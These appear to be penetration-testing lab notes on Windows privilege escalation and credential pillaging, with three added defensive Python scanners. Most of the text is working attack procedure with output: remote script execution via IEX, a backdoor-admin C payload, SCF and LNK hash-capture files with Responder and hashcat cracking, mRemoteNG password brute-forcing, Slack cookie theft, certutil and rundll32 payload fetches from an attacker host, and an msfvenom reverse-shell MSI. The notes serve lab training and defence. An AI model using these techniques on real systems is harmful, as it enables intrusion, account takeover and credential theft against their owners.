Additional Techniques

Interacting with Users


Traffic Capture

Check if Wireshark is installed

PS C:\mrci0x1> Get-WmiObject Win32_Product | Where-Object { $_.Name -like "*Wireshark*" }
IdentifyingNumber : {E089B4F1-1817-4C93-BF4C-77C5EB8075F1}
Name              : Wireshark 3.2.0
Vendor            : The Wireshark developer community
Version           : 3.2.0
Caption           : Wireshark 3.2.0

Start capturing traffic with net-creds

mrci0x1@htb$ python3 net-creds.py -i eth0
[FTP] 10.10.10.50 -> USER admin
[FTP] 10.10.10.50 -> PASS password123

Analyze PCAP (if available)

mrci0x1@htb$ python3 net-creds.py -p capture.pcap
[SMB] 10.10.10.70 -> Username: user1, Password: mypassword

Process Command-Line Monitoring

Monitoring script (loop)

PS C:\mrci0x1> while($true){ $process = Get-WmiObject Win32_Process | Select-Object CommandLine; Start-Sleep 1; $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine; Compare-Object -ReferenceObject $process -DifferenceObject $process2 }

Hosting the script

mrci0x1@htb$ python3 -m http.server 80

Executing the script remotely

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')
InputObject                                           SideIndicator
-----------                                           -------------
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd} => 
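The loop above works because secrets passed as process arguments are visible to anyone who can read the process list; the same data (for example command lines from Sysmon Event ID 1 or Security event 4688 auditing) can be watched from the defender's side. This added Python detector is not part of the page's tooling: the tool list, regexes and sample command lines are constructed for the example, and the one line taken from the monitoring output above is shown only redacted.

```python
import re

# Constructed regexes (not from any tool on this page): each captures the
# account and the plaintext secret that an admin tool accepts on its command
# line. Add further tools as needed.
CRED_PATTERNS = {
    "net use":  re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>[^/\s]\S*)", re.I),
    "cmdkey":   re.compile(r"\bcmdkey(?:\.exe)?\b.*?/user:(?P<user>\S+).*?/pass:(?P<secret>\S+)", re.I),
    "schtasks": re.compile(r"\bschtasks(?:\.exe)?\b.*?/ru\s+(?P<user>\S+).*?/rp\s+(?P<secret>\S+)", re.I),
    "psexec":   re.compile(r"\bpsexec(?:64)?(?:\.exe)?\b.*?-u\s+(?P<user>\S+).*?-p\s+(?P<secret>\S+)", re.I),
}

def find_exposed_credentials(command_lines):
    """Return one finding per command line that carries a plaintext secret.
    The secret is replaced by *** so the detector's own output (alert, log
    line, ticket) does not become another copy of the credential."""
    findings = []
    for line in command_lines:
        for tool, pattern in CRED_PATTERNS.items():
            match = pattern.search(line)
            if match:
                secret = match.group("secret")
                findings.append({"tool": tool, "user": match.group("user"),
                                 "redacted": line.replace(secret, "***")})
                break  # one finding per command line
    return findings

# Constructed sample: the command line seen in the monitoring output above,
# plus lines that must not be flagged (no secret on the command line).
SAMPLE_COMMAND_LINES = [
    r"net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd",
    r"net use T: \\sql02\backups /user:inlanefreight\sqlsvc /persistent:no",
    r"cmdkey /add:sql02 /user:inlanefreight\sqlsvc /pass:Winter2022!",
    r"C:\Windows\system32\svchost.exe -k netsvcs -p",
    r"schtasks /create /tn backup /tr C:\Scripts\db-backup.ps1 /ru inlanefreight\sqlsvc /rp Winter2022! /sc daily",
]

if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_COMMAND_LINES):
        print(f"[{f['tool']}] {f['user']}: {f['redacted']}")
```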

Exploiting Vulnerable Services (Docker Example)

Check if Docker is installed

PS C:\mrci0x1> Get-WmiObject Win32_Product | Where-Object { $_.Name -like "*Docker*" }
IdentifyingNumber : {5B07FA1E-2E2F-4E4B-A7F3-00F09CA1C571}
Name              : Docker Desktop
Vendor            : Docker Inc.
Version           : 2.0.0.3
Caption           : Docker Desktop

Verify folder permissions

PS C:\mrci0x1> icacls "C:\ProgramData\DockerDesktop\version-bin"
C:\ProgramData\DockerDesktop\version-bin Everyone:(OI)(CI)(F)

Build malicious executable (example code)

#include <stdlib.h>
int main() {
    system("C:\\Windows\\System32\\cmd.exe /c net localgroup administrators backdoor /add");
    return 0;
}

Place payload into folder

PS C:\mrci0x1> copy docker-credential-wincred.exe C:\ProgramData\DockerDesktop\version-bin
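The root cause here is the icacls result above: a folder that a SYSTEM-level service loads binaries from is writable by Everyone. The same check applies to any directory a privileged task executes from, such as the C:\Scripts folder in the scheduled-task section later on. This added Python audit is not part of the page's tooling; it parses icacls output and flags write-capable ACEs for broad principals, and the principal list, rights list and sample output are constructed for the example.

```python
import re

# Principals that stand for "any user" (constructed list; compared lower-case).
BROAD_PRINCIPALS = {"everyone", "users", "builtin\\users", "authenticated users",
                    "nt authority\\authenticated users", "nt authority\\interactive"}
# Simple rights and specific-right codes that allow creating or replacing files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO"}

# One icacls line: optional path, a principal, then one or more (...) groups.
ACE_RE = re.compile(
    r"^(?P<path>.*?)\s*"
    r"(?P<principal>Everyone|CREATOR OWNER|BUILTIN\\[\w ]+|NT AUTHORITY\\[\w ]+"
    r"|NT SERVICE\\[\w ]+|APPLICATION PACKAGE AUTHORITY\\[\w ]+|[\w.-]+\\[\w.$-]+|[\w.-]+)"
    r":(?P<rights>(?:\([^)]*\))+)$")

def rights_tokens(rights):
    """'(OI)(CI)(Rc,S,WD)' -> {'OI', 'CI', 'RC', 'S', 'WD'}"""
    return {tok.strip().upper() for grp in re.findall(r"\(([^)]*)\)", rights)
            for tok in grp.split(",")}

def audit_icacls(output):
    """Return (path, principal, write_rights) for every ACE that gives a broad
    principal write access. icacls prints the path only on the first ACE of each
    object; the indented lines that follow belong to the same path."""
    findings, current_path = [], None
    for raw in output.splitlines():
        m = ACE_RE.match(raw.strip())
        if not m:
            continue
        current_path = m.group("path") or current_path
        writable = rights_tokens(m.group("rights")) & WRITE_RIGHTS
        if m.group("principal").lower() in BROAD_PRINCIPALS and writable:
            findings.append((current_path, m.group("principal"), sorted(writable)))
    return findings

# Constructed icacls output: the Docker folder from above, a correctly
# protected folder with one bad inherited ACE, and a writable scripts folder.
SAMPLE_ICACLS = r"""
C:\ProgramData\DockerDesktop\version-bin Everyone:(OI)(CI)(F)
                                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                        BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Program Files\TeamViewer BUILTIN\Users:(I)(OI)(CI)(RX)
                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(Rc,S,RD,WD,AD,REA,X,RA)
C:\Scripts BUILTIN\Users:(OI)(CI)(M)
"""

if __name__ == "__main__":
    for path, principal, rights in audit_icacls(SAMPLE_ICACLS):
        print(f"{path}: {principal} can write ({','.join(rights)})")
```

Feed it real output with `icacls "C:\ProgramData" /t` redirected to a file; paths the service actually executes from are the ones worth fixing first.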

Capturing Hashes with Malicious SCF Files

Prepare malicious SCF file

mrci0x1@htb$ echo "fake icon file" > /home/user/share/legit.ico

Contents of the .scf file:

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Run Responder

mrci0x1@htb$ sudo responder -wrf -v -I tun0
[SMB] NTLMv2-SSP Username : WINLPE-SRV01\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WINLPE-SRV01:815c504e7b06ebda:<...SNIP...>

Crack the hash

mrci0x1@htb$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Recovered........: 1/1 (100.00%) Digests
Hash.Target......: Administrator::WINLPE-SRV01:<...>:Welcome1

Capturing Hashes with Malicious LNK Files

Generate malicious .lnk file

PS C:\mrci0x1> $objShell = New-Object -ComObject WScript.Shell; $lnk = $objShell.CreateShortcut("C:\Users\htb-student\Desktop\legit.lnk"); $lnk.TargetPath = "\\10.10.14.51\@pwn.png"; $lnk.Save()

(Alternative) Generate with Lnkbomb

mrci0x1@htb$ lnkbomb -t \\10.10.14.3\@pwn.png -o legit.lnk

Deploy .lnk file to writable share

mrci0x1@htb$ cp legit.lnk /mnt/share/

Start Responder

mrci0x1@htb$ sudo responder -I tun0 -w -d
[SMB] NTLMv2-SSP Username : WINLPE-SRV01\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WINLPE-SRV01:afbd2e53bda4:<...SNIP...>

Crack hash (same as above)

mrci0x1@htb$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Recovered........: 1/1 (100.00%) Digests
Password.........: Welcome1
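Both the SCF and the LNK technique above come down to the same artefact: a file planted on a writable share whose icon or target path points at a UNC host the victim's machine will authenticate to. This added Python scanner (not from the page or any tool on it) flags such files in both the ANSI form used by .scf and the UTF-16LE form stored in .lnk; the regexes, allowlist and sample files are constructed for the example, and the LNK sample is only a header-plus-target stand-in, not a complete shortcut.

```python
import re
from pathlib import Path

# UNC server name in ANSI text (\\host\...) and in UTF-16LE (as stored in .lnk).
UNC_ANSI = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
UNC_WIDE = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")
# ShellLinkHeader: HeaderSize 0x4C followed by the fixed LinkCLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def unc_hosts(data):
    """Server names of every UNC path found in either encoding."""
    hosts = {m.group(1).decode("ascii") for m in UNC_ANSI.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le") for m in UNC_WIDE.finditer(data)}
    return hosts

def scan_file(name, data, allowed_hosts=frozenset()):
    """Classify a file as 'scf', 'lnk' or None and return the UNC hosts it
    points to that are IP literals or not on the allowlist."""
    if name.lower().endswith(".scf"):
        kind = "scf"
    elif data.startswith(LNK_MAGIC) or name.lower().endswith(".lnk"):
        kind = "lnk"
    else:
        return name, None, []
    flagged = sorted(h for h in unc_hosts(data)
                     if IPV4.fullmatch(h) or h.lower() not in allowed_hosts)
    return name, kind, flagged

def scan_share(root, allowed_hosts=frozenset()):
    """Walk a mounted share and report every .scf/.lnk with a suspicious target."""
    return [r for p in Path(root).rglob("*") if p.is_file()
            for r in [scan_file(p.name, p.read_bytes(), allowed_hosts)] if r[2]]

# Constructed samples: the SCF from above, a minimal stand-in for the LNK from
# above (real header magic + UTF-16LE target, not a complete .lnk), and a benign SCF.
SCF_SAMPLE = (b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.3\\share\\legit.ico\r\n"
              b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
LNK_SAMPLE = LNK_MAGIC + b"\x00" * 56 + "\\\\10.10.14.51\\@pwn.png".encode("utf-16-le")
BENIGN_SCF = b"[Shell]\r\nCommand=2\r\nIconFile=\\\\fileserver\\icons\\app.ico\r\n"

if __name__ == "__main__":
    for name, data in [("legit.scf", SCF_SAMPLE), ("legit.lnk", LNK_SAMPLE), ("app.scf", BENIGN_SCF)]:
        print(scan_file(name, data, allowed_hosts={"fileserver"}))
```

Run `scan_share("/mnt/share", {"fileserver"})` against a mounted share; a hit is worth pairing with an egress rule that blocks SMB (445) to hosts outside the allowlist.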

Pillaging

Enumerating Installed Applications

Listing Applications (Command Prompt)

C:\> dir "C:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is 900E-A7ED

 Directory of C:\Program Files

07/14/2022  08:31 PM    <DIR>          Adobe
07/14/2022  08:31 PM    <DIR>          Corsair
07/14/2022  08:31 PM    <DIR>          Google
07/14/2022  08:31 PM    <DIR>          Microsoft Office 15
07/14/2022  08:31 PM    <DIR>          mRemoteNG
07/14/2022  08:31 PM    <DIR>          OpenVPN
07/14/2022  08:31 PM    <DIR>          Streamlabs OBS
07/14/2022  08:31 PM    <DIR>          TeamViewer

Listing Applications (PowerShell)

PS C:\htb> $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
DisplayName                                         DisplayVersion    InstallLocation
-----------                                         --------------    ---------------
Adobe Acrobat DC (64-bit)                           22.001.20169      C:\Program Files\Adobe\Acrobat DC\
CORSAIR iCUE 4 Software                             4.23.137          C:\Program Files\Corsair\
Google Chrome                                       103.0.5060.134    C:\Program Files\Google\Chrome\
Microsoft Office Profesional Plus 2016 - es-es      16.0.15330.20264  C:\Program Files (x86)\Microsoft Office
Microsoft Office Professional Plus 2016 - en-us     16.0.15330.20264  C:\Program Files (x86)\Microsoft Office
mRemoteNG                                           1.62              C:\Program Files\mRemoteNG
TeamViewer                                          15.31.5           C:\Program Files\TeamViewer

Exploiting mRemoteNG

Locate Configuration File

PS C:\htb> ls C:\Users\julio\AppData\Roaming\mRemoteNG
Directory: C:\Users\julio\AppData\Roaming\mRemoteNG

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/21/2022   8:51 AM                Themes
-a----        7/21/2022   8:51 AM            340 confCons.xml
-a----        7/21/2022   8:51 AM            970 mRemoteNG.log

Decrypting Password (No Custom Password)

mrci0x1@htb$ python3 mremoteng_decrypt.py -s "sPp6b6Tr2iyXIdD/KFNGEWzzUyU84ytR95psoHZAFOcvc8LGklo+XlJ+n+KrpZXUTs2rgkml0V9u8NEBMcQ6UnuOdkerig=="
Password: ASDki230kasd09fk233aDA

Decrypting with Custom Password

mrci0x1@htb$ python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p admin
Password: ASDki230kasd09fk233aDA

Cracking Master Password (Bruteforce)

mrci0x1@htb$ for password in $(cat /usr/share/wordlists/fasttrack.txt); do \
> echo $password; \
> python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p $password 2>/dev/null; \
> done
Spring2017
Spring2016
admin
Password: ASDki230kasd09fk233aDA
admins

Abusing IM Clients (Slack Example)

Extracting Cookies from Firefox

PS C:\htb> copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
python3 cookieextractor.py --dbpath cookies.sqlite --host slack --cookie d
(201, '', 'd', 'xoxd-CJRafjAvR3UcF%2FXpCDOu6xEUVa3romzdAPiVoaqDHZW5A9oOpiHF0G749yFOSCedRQHi%2FldpLjiPQoz0OXAwS0%2FyqK5S8bw2Hz%2FlW1AbZQ%2Fz1zCBro6JA1sCdyBv7I3GSe1q5lZvDLBuUHb86C%2Bg067lGIW3e1XEm6J5Z23wmRjSmW9VERfce5KyGw%3D%3D', '.slack.com', '/', 1974391707, ...)

Use the extracted cookie with a browser extension (e.g., Cookie-Editor for Firefox):

  • Navigate to slack.com.

  • Open Cookie-Editor, add the d cookie with the extracted value, and save.

  • Refresh the page to log in as the user.

Extracting Cookies from Chromium-Based Browsers

PS C:\htb> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\htb> Invoke-SharpChromium -Command "cookies slack.com"
[*] Beginning Google Chrome extraction.
[X] Exception: Could not find file 'C:\Users\lab_admin\AppData\Local\Google\Chrome\User Data\\Default\Cookies'.
[*] Done.

Clipboard Monitoring

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger
https://portal.azure.com
Administrator@something.com
Sup9rC0mpl2xPa$$ws0921lk

Attacking Backup Servers (restic Example)

Check if restic exists

Get-ChildItem C:\Windows\System32\restic.exe

Initialize Repository

PS C:\htb> mkdir E:\restic2; restic.exe -r E:\restic2 init
enter password for new repository:
enter password again:
created restic repository fdb2e6dd1d at E:\restic2

Backup Files

PS C:\htb> $env:RESTIC_PASSWORD = 'Superbackup!'
PS C:\htb> restic.exe -r E:\restic2\ backup C:\SampleFolder
repository fdb2e6dd opened successfully, password is correct
created new cache
Files: 1 new
snapshot 9971e881 saved

Backup with Volume Shadow Copy

PS C:\htb> restic.exe -r E:\restic\ backup C:\Windows\System32\config --use-fs-snapshot
successfully created snapshot
error: Access is denied.
Warning: at least one source file could not be read

List Snapshots

PS C:\htb> restic.exe -r E:\restic2\ snapshots
ID        Time                 Host             Tags        Paths
9971e881  2022-08-09 14:18:59  PILLAGING-WIN01  C:\SampleFolder
b0b6f4bb  2022-08-09 14:19:41  PILLAGING-WIN01  C:\Windows\System32\config
afba3e9c  2022-08-09 14:35:25  PILLAGING-WIN01  C:\Users\jeff\Documents

Restore Snapshot

PS C:\htb> restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore

Dump SAM/SYSTEM

reg save HKLM\SAM C:\Restore\sam.hive
reg save HKLM\SYSTEM C:\Restore\system.hive

Dump hashes

secretsdump.py -sam sam.hive -system system.hive LOCAL

Miscellaneous Techniques

LOLBAS

File Transfer with certutil

C:\mrci0x1> certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

Encode file

C:\mrci0x1> certutil -encode file1 encodedfile

Decode file

PS C:\mrci0x1> certutil -decode encodedfile file2

Execute DLL via rundll32

PS C:\mrci0x1> rundll32.exe \\10.10.14.3\share\malicious.dll,EntryPoint

Check the LOLBAS site for other binaries: https://lolbas-project.github.io/


AlwaysInstallElevated

Check registry values

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate malicious MSI (Linux)

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Start netcat listener

nc -lnvp 9443

Execute MSI on target

PS C:\mrci0x1> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Expected Output

connect to [10.10.14.3] from (UNKNOWN) [10.129.43.33] 49720
Microsoft Windows [Version 10.0.18363.592]
whoami
nt authority\system

CVE-2019-1388 (hhupd.exe)

CVE-2019-1388 is a privilege escalation vulnerability in the Windows Certificate Dialog, allowing a low-privilege user to launch a browser as SYSTEM by exploiting a signed executable (hhupd.exe) with a specific certificate field (SpcSpAgencyInfo).

  1. Right-click hhupd.exe and select Run as administrator.

  2. In the UAC prompt, click Show information about the publisher’s certificate.

  3. In the Certificate dialog, check the Details tab for the SpcSpAgencyInfo field with a hyperlink (e.g. https://www.verisign.com/repository/CPS).

  4. In the General tab, click the Issued by hyperlink and click OK.

  5. A browser launches as SYSTEM (verify in Task Manager).

  6. Right-click the webpage, select View page source.

  7. Right-click in the source view, select Save as.

  8. In the Save As dialog, enter C:\Windows\System32\cmd.exe and press Enter.

PS C:\mrci0x1> C:\Windows\System32\cmd.exe

Verify escalation

PS C:\mrci0x1> whoami

Expected Output

nt authority\system

Enumerating Scheduled Tasks

Enumerate via schtasks (CMD)

PS C:\mrci0x1> schtasks /query /fo LIST /v

Enumerate via PowerShell

PS C:\mrci0x1> Get-ScheduledTask | select TaskName,State

Check permissions on script folders

PS C:\mrci0x1> .\accesschk64.exe /accepteula -s -d C:\Scripts\

Exploit writable script

PS C:\mrci0x1> Add-Content -Path C:\Scripts\db-backup.ps1 -Value "net localgroup administrators htb-student /add"

Verify escalation

PS C:\mrci0x1> whoami

Expected Output

nt authority\system

User/Computer Description Fields

Get Local Users Descriptions

PS C:\mrci0x1> Get-LocalUser

Get Computer Description

PS C:\mrci0x1> Get-WmiObject -Class Win32_OperatingSystem | select Description

Example Output

Name            Enabled Description
Administrator   True    Built-in account for administering the computer/domain
secsvc          True    Network scanner - do not change password

Mounting VHDX/VMDK Files & Dumping Hashes

Search for backup files (with Snaffler)

C:\mrci0x1> snaffler.exe -s \\FILE01\backups -o snaffler_output.txt

Mount .vmdk on Linux

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk

Mount .vhdx on Linux

guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1

Mount .vhdx on Windows

PS C:\mrci0x1> Mount-VHD -Path C:\backups\WEBSRV10.vhdx -ReadOnly

Extract Registry Hives

  • Navigate to /mnt/vmdk/Windows/System32/config/

  • Copy: SAM, SECURITY, SYSTEM

Dump hashes with secretsdump

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Crack hashes with Hashcat

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
